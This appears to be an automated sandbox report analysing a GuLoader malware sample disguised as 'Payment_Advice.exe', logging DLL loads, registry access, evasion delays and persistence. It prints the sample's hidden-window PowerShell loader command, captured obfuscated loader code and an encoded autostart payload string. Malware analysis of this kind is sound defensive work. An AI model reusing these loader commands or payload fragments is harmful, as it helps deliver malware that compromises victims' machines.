Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbu source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aqm.Core.pdbh source: powershell.exe, 00000002.00000002.2435366329.00000000076DC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl] source: powershell.exe, 00000002.00000002.2435366329.0000000007645000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbB396-481F-9042-AD358843EC24c source: powershell.exe, 00000002.00000002.2438381665.0000000008840000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2439089411.0000000009D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Diodens $Fejlnormerne $Kontrolliniens), (Furfurylidene @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Affrayed = [AppDomain]::CurrentDomain.GetAssemblies(
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Powerboats)), $Taphvirvler).DefineDynamicModule($Kild, $false).DefineType($Ratakslerne, $Punktnedslagenes147, [System.MulticastDelegat

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Payment_Advice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
Source: C:\Users\user\Desktop\Payment_Advice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "			Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E5E61C pushfd ; ret	2_2_04E5E625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04E5E002 pushfd ; ret	2_2_04E5E021
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0799F63A push edx; iretd	2_2_0799F63B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07999285 pushad ; ret	2_2_07999291
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_028B9C30 push esp; retf 2165h	5_2_028B9D55

Persistence and Installation Behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\Desktop\Payment_Advice.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe

Jump to dropped file

Boot Survival

Powershell creates an autostart link

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: .lnKostaldg Interne,cheirer gulvhjnconcu.ieEpiphytsAscarid/Heroise`$F,erledD SanktbiSubcortsRhes,amk Strik,eGraverir Lbin.tyStdlist]Kle use Tripaln=Tripped SurfendPOpbr,dsiVold,gts Ha.chjsAaledeao Mosegri Buddi,rCa makieKa.danerWarpat, Ddgodbi`$NeutersVOrganisiUn,ssemctelefontVisceraoFl,ngeirLoebetiiAsela,aaHeredolnSocioloe skyl or,raperen Bro.ateavancemsfirling[ Movere`$Timote.IMankoermPiositim Skatt uma cosinB ugerfiSkrmtrosBufagineFladbrnrhydroxyi Fals,nnfournitgAbitureeEeryraar ,anikinSh.oudyeKmpernesPrgtigs/ Tyves `$BoffinsDFredniniCurdlessBesaavakSkovflaeMinnikarImplemeyVaun.mu] lvekil Undeci 2reproba3Raspier9skrksla;Bouleva slosh. Ganoce, Lille,r U.opulr}SynsperProcent`$ ProphlR BullgitUdsletteaarvaagg AculearpolysponLockupvn.andfane klargr=book,es[DallyinS VoldtgtPulterkr pe sdyiLlebrdenUnsolargPapirsp] pansun[Upge.teS OriginyNonherosBrmmeswt Frowsie C,owdimJaevntv. van vrTRedistre Dingiex.eromyrtTeleka.. S abioE projeknMa euvecIliocoso C,rpaidChondr.iFor.angnZi.zagggWhistle]Haemato: Udeneu:KyaniseATilfredS LeadenC fo,sytI,alleriITachjen.SissismGSt afare Gennemt,sonnerSTrottoitIntegrarA.bestoiQurshesnInjur eg Refect( Cataph`$Jurat,dVC,rkingiNa,rendcDatablatLselystoBuckto,rNoctambiDemissiaU,enadlnChiquite arbonirLsrepannKastrate Bek,ftsCesuras)Metapho; ForpasSir.pshiHankns,fPurchas Samurai(Toastbr`$adjunkdI BrdrismErvhystmTand.tauDriftsrnAughtvii Metaphs Momsude ybriderMel nosiOutttorn Catskig r gioneMalerejr Piret,nTermchaeRefus.rsOri,atinDisloyadSvineavhInvers.oBrudstylLoyaltydalbuminsIngaevorSprrersi Maksimg Ma.betttribut )Salvage encrot{Overl,s Upshi tStolthe.Sy.temk(Pendent`$KadettePFetaer,aRetsaktufligedesForgnges Tjlen iSnde.jydTetrahyaforraade ounter)Katego. Fli tin`$ N nspeRInf,atitImbecileRearrayg Cele,erRobotizn .ahognntriorche Unorga;ThermobRegines}Acroti eSemi ralBootablsFlgesygeUd,rads G.vandt{Led,lse;Alkohol.horidg`$AftaletR.oderaatCachaloepersonngPassivdrTroklednNe paganHos.eaneStands ;snitvrk Ledida}Udsv.dn}Cyanfor`$ AnretnTh,vedstaHomatomparealerhSur.ulevMarliesiIndvlgerCitolervTusindklFortyndecopycutr Uopkla=Part tiHGuiltskiBilbrangHold pshf,emtidl Bodyguoirrad aw Trades Ant.me'TronfoeBliteratDSheiker9CrocodyABromdec8Enhorro1.ermies'Pacific;Dioxal.`$Imp.rceH I.tstyePerip.plUrbsvriaHarmonifPrunelltPahlavieSta ensn Buskons Neolibf Assobri cellevlJenvippm Encolo=V sitorHComprisiLurmrkegArbejdshcirrhu lUdenlanoLnf rbewda olin Affrend'CharlybBRhipidoC Svanek9Sibe ic6 Bassan9RundvisCBounde,9NonfarmBBrusure8.ngeridA.orsoni8Villigt2ServiceC Sniffe1 Solsti8Uns.aleB Krater8Clearmi3O ganon8Trusser3 Anti,l'Adresse;bystens`$GaloplbFU,deligimonotoct Del,stzA.aplasw GrafikaChoripetAnoesise Hovedar Antiri=SorehonH FerrariCoostbagPackplahThessallVdr ttwoSkru,skwRhythmd .oodled'indkberAGos.ell2Splayda8Busgade6Higgleh8HypnotiCpiuria.9HomogenDZygosis8Trommes0 Gennem9G,sblusC Elemen8O twait0Rustica8For mte9Dronep 9MineralBHydromeCTilhu,g1 ExternBAkkredi8Tungmet8 pinkel6Porce.n8 Sifflo1ScavageDGrkerenCTransm DKompostDInterflCUnflawe1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 48A47E9

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 21680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 23680000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597186	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595064	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5941	Jump to behavior
